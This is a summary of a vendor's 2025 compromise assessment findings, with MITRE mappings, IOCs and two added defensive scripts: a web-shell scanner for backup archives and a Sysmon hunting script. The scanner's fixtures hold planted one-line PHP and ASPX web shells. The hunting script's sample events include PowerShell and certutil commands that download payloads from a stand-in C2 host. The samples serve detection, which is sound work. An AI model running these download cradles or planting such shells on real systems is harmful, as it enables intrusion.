Kaspersky’s 2025 compromise assessment report shows that many serious intrusions went undetected for months or even years; the oldest missed incident dated back four years. The report highlights recurring abuse of web shells, LoLBins and remote management tools, and names the campaigns, actors and tooling seen across engagements: NSABuffMiner, PurpleFox, LionTail, Scarred Manticore, Impacket, Cobalt Strike, Mimikatz and ClipBanker.
Keypoints
- Proactive compromise assessments found fewer high-severity incidents than reactive, post-incident checks.
- About 20% of incidents were found only through manual analysis, and roughly 60% had gone unnoticed because the existing tooling produced no high-confidence alert for them.
- Many incidents were long-lived: 30.8% had activity older than three months, and the oldest was undetected for four years.
- Web shells frequently survived inside backup archives; these backup copies accounted for 40% of the web shell cases found.
- Remote management tools and LoLBins appeared in every engagement that led to incident detection.
- Weak monitoring, poor alert validation, and communication gaps were major reasons threats remained hidden.
- Detected activity spanned multiple campaigns and tools, including NSABuffMiner, PurpleFox, LionTail, Impacket, Cobalt Strike, and Mimikatz.
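The finding that web shells outlive cleanup inside backups suggests a concrete check: scan backup archives for script files that carry web-shell signatures before they are restored or kept. The scanner below is an added example written for this page, not code from Kaspersky or the report; the archive contents and the detection patterns are constructed here. It handles zip and tar archives with the standard library; the RAR backup mentioned in the IOCs would need an external reader.

```python
"""Scan backup archives for PHP/ASP(X)/JSP files that look like web shells.

Added example for this page (not code from the report). Zip and tar are
handled with the standard library; a RAR backup needs an external reader.
"""
import io
import re
import sys
import tarfile
import zipfile
from dataclasses import dataclass
from typing import Iterator

WEB_EXTS = (".php", ".phtml", ".php5", ".asp", ".aspx", ".ashx", ".asmx", ".jsp", ".jspx")

# Request input flowing straight into eval/exec, or a decode-then-eval chain.
# Rare in application code, typical of web shells. Patterns constructed here.
PATTERNS = [
    ("php_eval_input", re.compile(
        rb"\b(?:eval|assert)\s*\(\s*.{0,40}?\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I | re.S)),
    ("php_exec_input", re.compile(
        rb"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*.{0,40}?"
        rb"\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I | re.S)),
    ("php_dynamic_call", re.compile(rb"\$\w+\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("php_decode_eval", re.compile(
        rb"\beval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I)),
    ("aspx_eval_request", re.compile(rb"\beval\s*\(\s*Request\b", re.I)),
    ("aspx_process_request", re.compile(
        rb"\bProcess(?:StartInfo)?\b.{0,200}?\bRequest\s*[.\[]", re.I | re.S)),
]


@dataclass
class Finding:
    archive: str
    member: str
    rule: str
    snippet: str


def iter_members(name: str, data: bytes) -> Iterator[tuple[str, bytes]]:
    """Yield (member path, content) for each regular file in a zip or tar archive."""
    buf = io.BytesIO(data)
    if zipfile.is_zipfile(buf):
        buf.seek(0)
        with zipfile.ZipFile(buf) as zf:
            for info in zf.infolist():
                if not info.is_dir():
                    yield info.filename, zf.read(info)
        return
    buf.seek(0)
    try:
        with tarfile.open(fileobj=buf, mode="r:*") as tf:
            for member in tf.getmembers():
                fobj = tf.extractfile(member) if member.isfile() else None
                if fobj is not None:
                    yield member.name, fobj.read()
    except tarfile.TarError:
        raise ValueError(f"{name}: not a zip or tar archive (RAR needs an external reader)")


def scan_web_file(content: bytes) -> list[tuple[str, str]]:
    """Return (rule, matched snippet) for every pattern that fires on one file."""
    hits = []
    for rule, pattern in PATTERNS:
        m = pattern.search(content)
        if m:
            hits.append((rule, m.group(0)[:80].decode("utf-8", "replace")))
    return hits


def scan_archive(name: str, data: bytes) -> list[Finding]:
    """Scan every web-script member of an archive; binaries and assets are skipped."""
    return [Finding(name, member, rule, snippet)
            for member, content in iter_members(name, data)
            if member.lower().endswith(WEB_EXTS)
            for rule, snippet in scan_web_file(content)]


def build_sample_backup() -> bytes:
    """Constructed sample: a site backup with one clean page and two planted shells."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("wwwroot/index.php", b"<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>")
        zf.writestr("wwwroot/uploads/logo.png", b"\x89PNG\r\n\x1a\n")
        zf.writestr("wwwroot/uploads/.cache.php", b"<?php @eval($_POST['c']); ?>")
        zf.writestr("wwwroot/aspnet_client/x.aspx",
                    b'<%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>')
    return buf.getvalue()


if __name__ == "__main__":
    # Scan the archives named on the command line, or the constructed sample.
    targets = [(p, open(p, "rb").read()) for p in sys.argv[1:]] or [("sample.zip", build_sample_backup())]
    for archive, data in targets:
        for f in scan_archive(archive, data):
            print(f"{f.archive}: {f.member} [{f.rule}] {f.snippet}")
```

Run it over the backup share before a restore, and treat any hit on a file that is not in the application’s source tree (dotfiles in uploads, stray .aspx under aspnet_client) as a web shell until proven otherwise.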
MITRE Techniques
- [T1053.003] Scheduled Task/Job: Cron – Used on Linux systems to re-fetch a web shell and to launch propagation and mining scripts (‘a cron job that automatically fetched a copy of a PHP web shell’ / ‘creating scheduled tasks to execute the propagation and infection scripts’).
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – ClipBanker persisted through a Run key value in the local administrator’s hive (‘maintaining persistence by adding itself to the registry key …\CurrentVersion\Run\9Er6IIp’).
- [T1546.003] Event Triggered Execution: Windows Management Instrumentation Event Subscription – A malicious WMI event consumer downloaded and executed PowerShell (‘a malicious WMI event consumer was detected that downloads and executes a PowerShell script’).
- [T1059.004] Command and Scripting Interpreter: Unix Shell – A bash reverse shell gave the attacker an interactive command channel (‘the process list showed a bash reverse shell’).
- [T1059.001] Command and Scripting Interpreter: PowerShell – Used to download payloads and execute code (‘downloads and executes a PowerShell script’ / ‘executed a PowerShell command that downloaded an executable’).
- [T1036.005] Masquerading: Match Legitimate Name or Location – A spoofed svchost.exe and files planted under C:\Windows\Fonts\Mysql were named and placed to blend in with the operating system (‘a spoofed svchost.exe’). Explorer’s view of the Fonts folder lists only font files, so anything else dropped there stays out of sight; that concealment is [T1564.001] Hide Artifacts: Hidden Files and Directories (‘only font files in this directory are visible’).
- [T1562.001] Impair Defenses: Disable or Modify Tools – The malware’s folder was added to Windows Defender exclusions so it would not be scanned (‘adding the malware’s folder to Windows Defender exclusions’).
- [T1112] Modify Registry – Both the Run-key persistence (‘adding itself to the registry key …\Run’) and the Defender exclusion are registry writes; the latter lands under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions.
- [T1105] Ingress Tool Transfer – Payloads were pulled from a public GitHub repository and from command-and-control infrastructure (‘downloads and executes a PowerShell script’ / ‘fetched a copy … from a public GitHub repository’).
- [T1047] Windows Management Instrumentation – WMI was used for execution and persistence; scrcons.exe, the host process for script-based WMI event consumers, appears among the artifacts (‘a malicious WMI event consumer’).
- [T1003] OS Credential Dumping – A Mimikatz binary and a memory dump together confirmed credential theft (‘the presence of a Mimikatz binary and a memory dump … confirming that a credential theft operation had indeed taken place’).
- [T1021.002] Remote Services: SMB/Windows Admin Shares – Propagation ran over SMB (port 445), and a .cmd script was pushed to every server with PsExec, which runs through a remotely created service ([T1569.002] System Services: Service Execution) (‘spreads via the SMB protocol’ / ‘used PsExec to execute a .cmd script across all the servers’). The EternalBlue and DoublePulsar DLL names among the artifacts point to the spreading component exploiting the SMB service itself ([T1210] Exploitation of Remote Services).
- [T1041] Exfiltration Over C2 Channel – Scarred Manticore hid exfiltration inside normal-looking traffic (‘performs data exfiltration while carefully masking command-and-control communications’).
- [T1071.001] Application Layer Protocol: Web Protocols – LionTail delivered and retrieved payloads over inbound HTTP traffic (‘covertly deliver and retrieve payloads via inbound HTTP traffic’).
- [T1055] Process Injection – Malicious DLLs were injected into lsass.exe and explorer.exe (‘inject the malicious DLLs … into lsass.exe and explorer.exe’).
- [T1218] System Binary Proxy Execution – LoLBins such as certutil, bitsadmin, regsvr32 and wmic were abused (‘binaries that are part of the operating system … often repurposed for lateral movement, data exfiltration, and persistence’).
- [T1219] Remote Access Software – TeamViewer and AnyDesk were present in every engagement that produced an incident, alongside VNC servers, which fall under [T1021.005] Remote Services: VNC (‘observed remote management utilities span both proprietary platforms, such as TeamViewer and AnyDesk, and … VNC servers’).
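Most of the Windows techniques above leave a trace that Sysmon records: Event ID 20 for WMI consumer creation, 13 for Run-key and Defender-exclusion value writes, 1 for process creation (a spoofed svchost.exe, a LoLBin reaching out to the network) and 11 for files dropped into the Fonts directory. The script below runs those checks over a handful of constructed Sysmon-style records. It is an added example written for this page, not Kaspersky’s tooling; the events, the placeholder domain c2.example.invalid and the SID are made up, and the field names follow Sysmon’s event schema.

```python
"""Hunt Sysmon-style events for the Windows TTPs described in the report.

Added example for this page; all events are constructed, not from the report.
Field names follow Sysmon's schema (EventID 1 ProcessCreate, 11 FileCreate,
13 RegistryEvent value set, 20 WmiEvent consumer activity).
"""
import re
from dataclasses import dataclass
from typing import Callable

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Where these Windows binaries legitimately live; a copy anywhere else is spoofed.
EXPECTED_DIRS = {
    "svchost.exe": SYSTEM_DIRS,
    "lsass.exe": SYSTEM_DIRS,
    "taskhost.exe": SYSTEM_DIRS,
    "scrcons.exe": ("c:\\windows\\system32\\wbem\\",),
    "explorer.exe": ("c:\\windows\\",),
}
LOLBINS = {"certutil.exe", "bitsadmin.exe", "regsvr32.exe", "wmic.exe", "mshta.exe", "rundll32.exe"}
NETWORK_ARGS = ("http://", "https://", "-urlcache", "/transfer", "scrobj.dll")
USER_WRITABLE = re.compile(
    r"%temp%|\\appdata\\|\\users\\[^\\]+\\downloads\\|\\programdata\\|\\windows\\temp\\|\\windows\\fonts\\",
    re.I)
FONT_EXTS = (".ttf", ".otf", ".ttc", ".fon", ".pfb", ".pfm", ".fot", ".compositefont")


@dataclass
class Alert:
    technique: str
    reason: str
    event: dict


def split_image(image: str) -> tuple[str, str]:
    """Return (directory with trailing backslash, basename), lower-cased."""
    d, _, base = image.lower().rpartition("\\")
    return d + "\\", base


def wmi_consumer(e: dict) -> bool:
    # A CommandLine or ActiveScript consumer is almost never created by administrators.
    return e["EventID"] == 20 and e.get("Type", "").lower() in ("commandline", "activescript")


def run_key_to_user_path(e: dict) -> bool:
    return (e["EventID"] == 13
            and "\\currentversion\\run" in e["TargetObject"].lower()
            and USER_WRITABLE.search(e.get("Details", "")) is not None)


def defender_exclusion(e: dict) -> bool:
    return e["EventID"] == 13 and "\\windows defender\\exclusions\\" in e["TargetObject"].lower()


def spoofed_system_binary(e: dict) -> bool:
    if e["EventID"] != 1:
        return False
    d, base = split_image(e["Image"])
    expected = EXPECTED_DIRS.get(base)
    return expected is not None and d not in expected


def lolbin_with_network_arg(e: dict) -> bool:
    if e["EventID"] != 1:
        return False
    cmd = e.get("CommandLine", "").lower()
    return split_image(e["Image"])[1] in LOLBINS and any(t in cmd for t in NETWORK_ARGS)


def non_font_in_fonts_dir(e: dict) -> bool:
    if e["EventID"] != 11:
        return False
    target = e["TargetFilename"].lower()
    return target.startswith("c:\\windows\\fonts\\") and not target.endswith(FONT_EXTS)


RULES: list[tuple[str, str, Callable[[dict], bool]]] = [
    ("T1546.003", "WMI event consumer that runs a command line or script", wmi_consumer),
    ("T1547.001", "Run key pointing at a user-writable location", run_key_to_user_path),
    ("T1562.001", "Windows Defender exclusion added", defender_exclusion),
    ("T1036.005", "System binary name running from the wrong directory", spoofed_system_binary),
    ("T1218", "LoLBin invoked with a network/download argument", lolbin_with_network_arg),
    ("T1564.001", "Non-font file dropped into C:\\Windows\\Fonts", non_font_in_fonts_dir),
]


def hunt(events: list[dict]) -> list[Alert]:
    return [Alert(t, why, e) for e in events for t, why, pred in RULES if pred(e)]


# Constructed records: four benign, then six modelled on the report's observations.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"EventID": 13, "TargetObject": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SecurityHealth",
     "Details": "C:\\Windows\\System32\\SecurityHealthSystray.exe"},
    {"EventID": 11, "TargetFilename": "C:\\Windows\\Fonts\\segoeui.ttf"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -verify cert.cer"},
    {"EventID": 20, "Operation": "Created", "Name": "Updater", "Type": "CommandLine",
     "Destination": "powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient)"
                    ".DownloadString('http://c2.example.invalid/a.ps1')\""},
    {"EventID": 13, "TargetObject": "HKU\\S-1-5-21-1-2-3-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\9Er6IIp",
     "Details": "C:\\Users\\admin\\AppData\\Local\\Temp\\svchost.exe"},
    {"EventID": 13, "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Users\\admin\\Downloads",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 1, "Image": "C:\\Users\\admin\\AppData\\Local\\Temp\\svchost.exe", "CommandLine": "svchost.exe"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://c2.example.invalid/dl1host.exe %TEMP%\\dl1host.exe"},
    {"EventID": 11, "TargetFilename": "C:\\Windows\\Fonts\\Mysql\\nei.bat"},
]

if __name__ == "__main__":
    for a in hunt(SAMPLE_EVENTS):
        print(f"{a.technique}: {a.reason} -> {a.event}")
```

The rules are deliberately narrow so that each one is a high-confidence alert rather than the kind of noise the report says analysts never validated; widening the user-writable path list or the LoLBin set is where local tuning belongs.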
Indicators of Compromise
- [File names] Hidden or malicious files used for persistence and mining on domain controllers – nei.bat, dl1host.exe, a spoofed svchost.exe (any copy running from outside System32 or SysWOW64), and generic names such as bat.bat and cmd.bat.
- [Paths] Locations used to hide web shells and malicious files – C:\Windows\Fonts\Mysql, D:\backup\[redacted_for_privacy].rar/wwwroot//[redacted_for_privacy].aspx (a web shell inside a backup archive).
- [Registry keys] Persistence and startup-related registry locations – HKU\S-1-5-21-[REDACTED]-500\Software\Microsoft\Windows\CurrentVersion\Run\9Er6IIp (RID 500 is the built-in Administrator account), HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall.
- [Filenames/scripts] Scripts used in lateral movement and propagation – poab.bat, load.bat, loab.bat, and the .cmd scripts pushed with PsExec.
- [Malware/tool names] Detected malicious tools and families – NSABuffMiner, PurpleFox, LionTail, Cobalt Strike, Mimikatz, ClipBanker.
- [DLL names] Injected or malicious DLLs referenced in the activity – Eternalblue2.dll, Doublepulsar2.dll.
- [Service/task names] Persistence objects created for mining and execution – MicrosoftMysql, MicrosoftFonts, MicrosoftMSSql, At1, At2 (At1 and At2 are the default names given to jobs created with at.exe).
- [User/account names] Accounts involved in suspicious execution – apache (web server service account), local administrator account.
- [Network indicators] Network details associated with scanning and compromise – SMB port 445, NetBIOS port 139, a public GitHub repository used to stage payloads, command-and-control server.
- [Windows objects] System artifacts observed during investigation – scrcons.exe (host process for script-based WMI event consumers), lsass.exe, explorer.exe, taskhost.exe.
- [Directories/paths] File system locations tied to malicious activity or concealment – %TEMP%, user Downloads folder, /Users/[REDACTED]/.claude/shell-snapshots/.
Read more: https://securelist.com/compromise-assessment-findings-2025/120542/